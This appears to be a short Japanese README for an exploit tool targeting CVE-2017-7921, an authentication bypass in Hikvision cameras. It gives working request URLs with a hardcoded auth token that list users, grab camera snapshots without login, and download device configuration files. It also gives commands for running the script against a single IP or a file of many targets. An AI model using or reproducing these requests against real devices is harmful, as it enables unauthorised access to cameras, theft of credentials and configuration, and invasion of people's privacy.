
Hikvisionカメラ CVE-2017-7921-EXP
Hikvision デバイスで、不適切な認証の問題が発見されました。
不適切な認証の脆弱性は、アプリケーションがユーザーを適切に、または正しく認証しない場合に発生します。
これにより、悪意のあるユーザーがシステム上で権限を昇格させ、機密情報にアクセスできる可能性があります。
https://seclists.org/fulldisclosure/2017/Sep/23
脆弱性の詳細:
----------------------
すべてのユーザーとその役割の一覧を取得する:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
認証なしでカメラのスナップショットを取得する:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
そして最悪なことに、カメラの設定をダウンロードできる:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
